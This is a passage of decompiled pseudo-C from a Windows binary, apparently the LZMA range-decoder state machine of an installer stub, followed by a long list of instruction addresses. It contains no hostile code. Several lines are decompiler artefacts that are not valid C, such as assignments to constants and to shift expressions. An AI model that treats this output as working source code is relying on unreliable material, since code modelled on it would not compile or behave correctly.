												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406e7c
0x00406e7c
0x00406e80
0x00406ea5
0x00406eaf
0x00000000
0x00406e82
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8f
0x00406e93
0x00406e93
0x00406e96
0x00406f70
0x00406f70
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00406fae
0x00406fb2
0x00407012
0x00407015
0x0040701a
0x0040701b
0x0040701d
0x0040701f
0x00407022
0x00406f2e
0x00406f2e
0x00406f2e
0x004066ca
0x004066ca
0x004066ca
0x004066d3
0x00000000
0x00000000
0x004066d9
0x00000000
0x004066e4
0x00000000
0x00000000
0x004066ed
0x004066f0
0x004066f3
0x004066f7
0x00000000
0x00000000
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406743
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
0x00000000
0x00407035
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00000000
0x00407044
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f03
0x00406f07
0x004070b6
0x00000000
0x004070b6
0x00406f13
0x00406f1a
0x00406f22
0x00406f25
0x00406f28
0x00406f28
0x00000000
0x00000000
0x00406846
0x00406848
0x0040684b
0x004068bc
0x004068bf
0x004068c2
0x004068c9
0x004068d3
0x00000000
0x004068d3
0x0040684d
0x00406851
0x00406854
0x00406856
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x0040686e
0x00406872
0x00406879
0x0040687c
0x00406883
0x00406887
0x0040688f
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406893
0x00406896
0x004068b4
0x004068b6
0x00000000
0x00406898
0x00406898
0x0040689b
0x0040689e
0x004068a1
0x004068a3
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x00000000
0x004068af
0x00000000
0x00406ae5
0x00406ae9
0x00406b07
0x00406b0a
0x00406b11
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b22
0x00406b29
0x00406b2a
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b35
0x00406b3a
0x00000000
0x00406b3a
0x00406aeb
0x00406aee
0x00406af1
0x00406afb
0x00000000
0x00000000
0x00406b4f
0x00406b53
0x00406b76
0x00406b79
0x00406b7c
0x00406b86
0x00406b55
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b6b
0x00406b6e
0x00406b6e
0x00000000
0x00000000
0x00406b92
0x00406b96
0x00000000
0x00000000
0x00406b9c
0x00406ba0
0x00000000
0x00000000
0x00406ba6
0x00406ba8
0x00406bac
0x00406bac
0x00406baf
0x00406bb3
0x00000000
0x00000000
0x00406c03
0x00406c07
0x00406c0e
0x00406c11
0x00406c14
0x00406c1e
0x00000000
0x00406c1e
0x00406c09
0x00000000
0x00000000
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00406c44
0x00406c44
0x00406c47
0x00406c4a
0x00406c4d
0x00406c4d
0x00406c50
0x00406c57
0x00406c5c
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x004068df
0x004068df
0x004068e3
0x00407050
0x00000000
0x00407050
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x004068fe
0x00406901
0x00406904
0x00406904
0x00406907
0x0040690a
0x00000000
0x00000000
0x00406910
0x00406916
0x00000000
0x00000000
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697a
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x00406983
0x0040698a
0x0040698d
0x00000000
0x00406993
0x00000000
0x00406993
0x00000000
0x00406998
0x00406998
0x0040699c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069b7
0x004069ba
0x004069bd
0x004069bd
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0b
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a10
0x00406a17
0x00406a1a
0x00000000
0x00406a1c
0x00000000
0x00406a1c
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a21
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a60
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7b
0x00406a7e
0x00406a81
0x00406a81
0x00406a87
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00406a28
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa4
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
